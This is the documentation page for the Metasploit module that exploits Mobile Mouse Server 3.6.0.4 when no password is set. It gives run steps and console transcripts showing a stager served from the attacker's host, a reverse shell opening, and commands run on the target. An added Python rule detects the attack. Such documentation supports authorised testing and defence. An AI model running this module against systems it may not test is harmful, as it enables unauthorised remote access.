
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/misc/mobile_mouse_rce.md

Vulnerable Application

This module uses the protocol of the Mobile Mouse Server by RPA Technologies, Inc. to deploy a payload and run it from the server. The module will only deploy a payload if the server is configured without a password (the default). Tested against version 3.6.0.4, which was current at the time of module writing.

Version 3.6.0.4 can be downloaded from https://www.mobilemouse.com/downloads/setup.exe

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/windows/misc/mobile_mouse_rce

  4. Set rhost and lhost as required.

  5. Do: run

  6. You should get a shell as the user who is running Mobile Mouse.

Options

SLEEP

The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen. Defaults to 3, but can be a little touchy.

Scenarios

Mobile Mouse 3.6.0.4 on Windows 10

    resource (mobile_mouse.rb)> use exploits/windows/misc/mobile_mouse_rce
    [*] Using configured payload windows/shell/reverse_tcp
    resource (mobile_mouse.rb)> set rhosts 1.1.1.1
    rhosts => 1.1.1.1
    resource (mobile_mouse.rb)> set lhost 2.2.2.2
    lhost => 2.2.2.2
    resource (mobile_mouse.rb)> set verbose true
    verbose => true
    msf6 exploit(windows/misc/mobile_mouse_rce) > run
    [*] Started reverse TCP handler on 2.2.2.2:4444
    [*] 1.1.1.1:9099 - Client name set to: M6braOok6j
    [*] 1.1.1.1:9099 - Connecting
    [+] 1.1.1.1:9099 - Connected to hostname WIN10PROLICENSE with MAC address 00:0C:29:B3:68:3D
    [*] 1.1.1.1:9099 - Opening Command Prompt
    [*] 1.1.1.1:9099 - Sending stager
    [*] 1.1.1.1:9099 - Using URL: http://2.2.2.2:8080/
    [+] 1.1.1.1:9099 - Payload request received, sending 73802 bytes of payload for staging
    [*] 1.1.1.1:9099 - Opening Command Prompt again
    [+] 1.1.1.1:9099 - Payload request received, sending 73802 bytes of payload for staging
    [*] 1.1.1.1:9099 - Executing payload
    [*] Encoded stage with x86/shikata_ga_nai
    [*] Sending encoded stage (267 bytes) to 1.1.1.1
    [*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49696) at 2022-09-26 15:40:03 -0400
    [*] 1.1.1.1:9099 - Server stopped.
    [!] 1.1.1.1:9099 - This exploit may require manual cleanup of 'c:\Windows\Temp\gxYUnChTLrOuA.exe' on the target

    Shell Banner:
    Microsoft Windows [Version 10.0.16299.125]
    -----

    C:\Windows\Temp>whoami
    whoami
    win10prolicense\windows

    C:\Windows\Temp>systeminfo
    systeminfo

    Host Name: WIN10PROLICENSE
    OS Name: Microsoft Windows 10 Pro
    OS Version: 10.0.16299 N/A Build 16299
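The run above leaves two observable events on the target: an inbound connection to port 9099 and an executable started from c:\Windows\Temp. The following correlation rule is an added example for defenders, not part of the Metasploit documentation. The pipe-delimited event format, the event kinds `net_inbound` and `proc_start`, the 120-second window, and all sample events are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

MOBILE_MOUSE_PORT = "9099"            # server port shown in the scenario output
WINDOW = timedelta(seconds=120)       # assumed correlation window
TEMP_EXE = re.compile(r"^c:\\windows\\temp\\[^\\]+\.exe$", re.IGNORECASE)

# Constructed sample events, assumed format: time|host|kind|detail (time-ordered)
SAMPLE_EVENTS = r"""
2022-09-26T15:39:40|WIN10PROLICENSE|net_inbound|1.1.1.1:9099<-2.2.2.2:51514
2022-09-26T15:39:58|WIN10PROLICENSE|proc_start|C:\Windows\Temp\gxYUnChTLrOuA.exe
2022-09-26T15:41:00|FILESRV01|proc_start|C:\Windows\Temp\setup_helper.exe
2022-09-26T16:10:00|HR-LAPTOP|net_inbound|10.0.0.7:9099<-10.0.0.9:50001
2022-09-26T16:30:00|HR-LAPTOP|proc_start|C:\Windows\Temp\updater.exe
"""

def correlate(log_text):
    """Return (host, remote_ip, exe_path) for each Temp .exe started
    within WINDOW after an inbound connection to the Mobile Mouse port."""
    last_conn = {}                    # host -> (time, remote ip) of latest 9099 connection
    alerts = []
    for line in log_text.splitlines():
        fields = line.strip().split("|", 3)
        if len(fields) != 4:          # skip blank or malformed lines
            continue
        ts, host, kind, detail = fields
        when = datetime.fromisoformat(ts)
        if kind == "net_inbound":
            local, _, remote = detail.partition("<-")
            if local.rpartition(":")[2] == MOBILE_MOUSE_PORT:
                last_conn[host] = (when, remote.rpartition(":")[0])
        elif kind == "proc_start" and TEMP_EXE.match(detail):
            seen = last_conn.get(host)
            # Alert only when the process start closely follows the connection
            if seen and timedelta(0) <= when - seen[0] <= WINDOW:
                alerts.append((host, seen[1], detail))
    return alerts

if __name__ == "__main__":
    for host, peer, exe in correlate(SAMPLE_EVENTS):
        print(f"ALERT {host}: {exe} started after port-9099 connection from {peer}")
```

A Temp executable with no preceding port-9099 connection (FILESRV01) and one started long after a connection (HR-LAPTOP) are both left unflagged, which keeps ordinary Mobile Mouse use and unrelated installers out of the alert stream.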

Mobile Mouse 3.6.0.4 on Windows 10, with a password

This should fail as the exploit was not written to work with a password.

    resource (mobile_mouse.rb)> use exploits/windows/misc/mobile_mouse_rce
    [*] Using configured payload windows/shell/reverse_tcp
    resource (mobile_mouse.rb)> set rhosts 1.1.1.1
    rhosts => 1.1.1.1
    resource (mobile_mouse.rb)> set lhost 2.2.2.2
    lhost => 2.2.2.2
    resource (mobile_mouse.rb)> set verbose true
    verbose => true
    msf6 exploit(windows/misc/mobile_mouse_rce) > run
    [*] Started reverse TCP handler on 2.2.2.2:4444
    [*] 1.1.1.1:9099 - Client name set to: baqpHBHh5Q
    [*] 1.1.1.1:9099 - Connecting
    [-] 1.1.1.1:9099 - Exploit aborted due to failure: no-access: Unable to connect, server response: Please enter a password
    [*] Exploit completed, but no session was created.